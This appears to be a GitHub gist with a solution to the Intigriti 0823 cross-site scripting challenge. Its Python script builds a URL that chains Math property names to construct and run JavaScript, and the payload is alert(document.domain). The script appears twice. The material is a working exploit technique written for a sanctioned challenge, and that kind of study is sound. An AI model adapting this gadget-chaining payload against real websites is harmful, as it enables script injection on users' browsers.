arkark/README.md

## README.md

      
    Raw
  

              README.md
            
          
    intigriti / Challenge 0823 by huli


Challenge URL: https://challenge-0823.intigriti.io/
Author writeup: https://blog.huli.tw/2023/08/29/en/intigriti-0823-author-writeup/

My solution

$ python exploit.py

https://challenge-0823.intigriti.io/challenge/index.html?q=Math.E.valueOf,Math.sign,Math.log,Math.seeds.splice,Math.E.valueOf,Math.sign,Math.trunc.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.ceil.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.atan.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.random.name.sub.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.trunc.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.constructor.entries.name.at,Math.seeds.push,Math.random.name.normalize.name.length.valueOf,Math.random.name.constructor.fromCharCode,Math.seeds.push,Math.E.valueOf,Math.sign,Math.floor.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.round.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.acos.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.max.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.atan.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.sin.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.round.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.constructor.entries.name.at,Math.seeds.push,Math.random.name.valueOf,Math.seeds.join,Math.random.constructor,Math.seeds.reduce,Math.constructor.values,Math.seeds.sort.apply,Math.seeds.reverse.apply,Math.seeds.join.bind,Math.seeds.unshift,Math.E.valueOf,Math.sign,Math.seeds.splice,Math.random.name.valueOf,Math.seeds.unshift,Math.random.name.valueOf,Math.seeds.unshift,Math.seeds.pop,Math.seeds.reduce,Math.seeds.constructor.from,Math.seeds.reverse.apply,Math.seeds.join.bind,Math.seeds.reduce,Math.random.constructor,Math.seeds.reduce#//)niamod.tnemucod(trela

  
## exploit.py
BASE_URL = "https://challenge-0823.intigriti.io/challenge/index.html"
XSS_PAYLOAD = "alert(document.domain)"


def make_zero() -> list[str]:
    return [
        "Math.E.valueOf",
        "Math.sign",
        "Math.log",
    ]


def make_one() -> list[str]:
    return [
        "Math.E.valueOf",
        "Math.sign",
    ]


def clear_seeds() -> list[str]:
    return make_zero() + [
        "Math.seeds.splice",
    ]


char_to_list = {}

char_to_list["a"] = make_one() + [
    "Math.max.name.at",
]
char_to_list["c"] = make_one() + [
    "Math.acos.name.at",
]
char_to_list["d"] = make_zero() + [
    "Math.constructor.defineProperty.name.at",
]
char_to_list["e"] = make_one() + [
    "Math.ceil.name.at",
]
char_to_list["g"] = make_zero() + [
    "Math.constructor.getPrototypeOf.name.at",
]
char_to_list["h"] = make_zero() + [
    "Math.hypot.name.at",
]
char_to_list["i"] = make_one() + [
    "Math.sin.name.at",
]
char_to_list["l"] = make_one() + [
    "Math.floor.name.at",
]
char_to_list["m"] = make_zero() + [
    "Math.min.name.at",
]
char_to_list["n"] = make_one() + [
    "Math.constructor.entries.name.at",
]
char_to_list["o"] = make_one() + [
    "Math.round.name.at",
]
char_to_list["q"] = make_one() + [
    "Math.sqrt.name.at",
]
char_to_list["r"] = make_one() + [
    "Math.trunc.name.at",
]
char_to_list["s"] = make_zero() + [
    "Math.sin.name.at",
]
char_to_list["t"] = make_one() + [
    "Math.atan.name.at",
]
char_to_list["u"] = make_one() + [
    "Math.random.name.sub.name.at",
]
char_to_list["v"] = make_zero() + [
    "Math.constructor.values.name.at",
]
char_to_list["\t"] = [
    "Math.random.name.normalize.name.length.valueOf",
    "Math.random.name.constructor.fromCharCode",
]
char_to_list["\n"] = [
    "Math.random.name.replaceAll.name.length.valueOf",
    "Math.random.name.constructor.fromCharCode",
]


qs = []

qs += clear_seeds()
# Math.seeds === []

func_body = "return\tlocation"
for c in func_body:
    qs += char_to_list[c]
    qs += ["Math.seeds.push"]
# Math.seeds === ["r", "e", "t", ..., "n"]

qs += ["Math.random.name.valueOf"]
qs += ["Math.seeds.join"]
# -> "return\tlocation"

qs += [
    "Math.random.constructor",
    "Math.seeds.reduce",
]
# -> Function("return\tlocation")

qs += [
    "Math.constructor.values",
    "Math.seeds.sort.apply",
    "Math.seeds.reverse.apply",
    "Math.seeds.join.bind",
    "Math.seeds.unshift",
]
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse())), "r", "e", "t", ..., "n"]

qs += make_one()
qs += ["Math.seeds.splice"]
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse()))]

qs += [
    "Math.random.name.valueOf",
    "Math.seeds.unshift",
    "Math.random.name.valueOf",
    "Math.seeds.unshift",
]
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))]

qs += [
    "Math.seeds.pop",
    "Math.seeds.reduce",
]
# -> Object.values(location).sort().reverse().join("", "")
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))]

qs += [
    "Math.seeds.constructor.from",
    "Math.seeds.reverse.apply",
    "Math.seeds.join.bind",
    "Math.seeds.reduce",
]
# -> "alert(document.domain)//#..."

qs += [
    "Math.random.constructor",
    "Math.seeds.reduce",
]
# -> Function("alert(document.domain)//#...")("", "")

assert len(qs) < 100, len(qs)

print(f'{BASE_URL}?q={",".join(qs)}#{"".join(reversed(XSS_PAYLOAD + "//"))}')
# If you access this URL, `alert(document.domain)` will be executed.
	BASE_URL = "https://challenge-0823.intigriti.io/challenge/index.html"
	XSS_PAYLOAD = "alert(document.domain)"


	def make_zero() -> list[str]:
	return [
	"Math.E.valueOf",
	"Math.sign",
	"Math.log",
	]


	def make_one() -> list[str]:
	return [
	"Math.E.valueOf",
	"Math.sign",
	]


	def clear_seeds() -> list[str]:
	return make_zero() + [
	"Math.seeds.splice",
	]


	char_to_list = {}

	char_to_list["a"] = make_one() + [
	"Math.max.name.at",
	]
	char_to_list["c"] = make_one() + [
	"Math.acos.name.at",
	]
	char_to_list["d"] = make_zero() + [
	"Math.constructor.defineProperty.name.at",
	]
	char_to_list["e"] = make_one() + [
	"Math.ceil.name.at",
	]
	char_to_list["g"] = make_zero() + [
	"Math.constructor.getPrototypeOf.name.at",
	]
	char_to_list["h"] = make_zero() + [
	"Math.hypot.name.at",
	]
	char_to_list["i"] = make_one() + [
	"Math.sin.name.at",
	]
	char_to_list["l"] = make_one() + [
	"Math.floor.name.at",
	]
	char_to_list["m"] = make_zero() + [
	"Math.min.name.at",
	]
	char_to_list["n"] = make_one() + [
	"Math.constructor.entries.name.at",
	]
	char_to_list["o"] = make_one() + [
	"Math.round.name.at",
	]
	char_to_list["q"] = make_one() + [
	"Math.sqrt.name.at",
	]
	char_to_list["r"] = make_one() + [
	"Math.trunc.name.at",
	]
	char_to_list["s"] = make_zero() + [
	"Math.sin.name.at",
	]
	char_to_list["t"] = make_one() + [
	"Math.atan.name.at",
	]
	char_to_list["u"] = make_one() + [
	"Math.random.name.sub.name.at",
	]
	char_to_list["v"] = make_zero() + [
	"Math.constructor.values.name.at",
	]
	char_to_list["\t"] = [
	"Math.random.name.normalize.name.length.valueOf",
	"Math.random.name.constructor.fromCharCode",
	]
	char_to_list["\n"] = [
	"Math.random.name.replaceAll.name.length.valueOf",
	"Math.random.name.constructor.fromCharCode",
	]


	qs = []

	qs += clear_seeds()
	# Math.seeds === []

	func_body = "return\tlocation"
	for c in func_body:
	qs += char_to_list[c]
	qs += ["Math.seeds.push"]
	# Math.seeds === ["r", "e", "t", ..., "n"]

	qs += ["Math.random.name.valueOf"]
	qs += ["Math.seeds.join"]
	# -> "return\tlocation"

	qs += [
	"Math.random.constructor",
	"Math.seeds.reduce",
	]
	# -> Function("return\tlocation")

	qs += [
	"Math.constructor.values",
	"Math.seeds.sort.apply",
	"Math.seeds.reverse.apply",
	"Math.seeds.join.bind",
	"Math.seeds.unshift",
	]
	# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse())), "r", "e", "t", ..., "n"]

	qs += make_one()
	qs += ["Math.seeds.splice"]
	# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse()))]

	qs += [
	"Math.random.name.valueOf",
	"Math.seeds.unshift",
	"Math.random.name.valueOf",
	"Math.seeds.unshift",
	]
	# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))]

	qs += [
	"Math.seeds.pop",
	"Math.seeds.reduce",
	]
	# -> Object.values(location).sort().reverse().join("", "")
	# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))]

	qs += [
	"Math.seeds.constructor.from",
	"Math.seeds.reverse.apply",
	"Math.seeds.join.bind",
	"Math.seeds.reduce",
	]
	# -> "alert(document.domain)//#..."

	qs += [
	"Math.random.constructor",
	"Math.seeds.reduce",
	]
	# -> Function("alert(document.domain)//#...")("", "")

	assert len(qs) < 100, len(qs)

	print(f'{BASE_URL}?q={",".join(qs)}#{"".join(reversed(XSS_PAYLOAD + "//"))}')
	# If you access this URL, `alert(document.domain)` will be executed.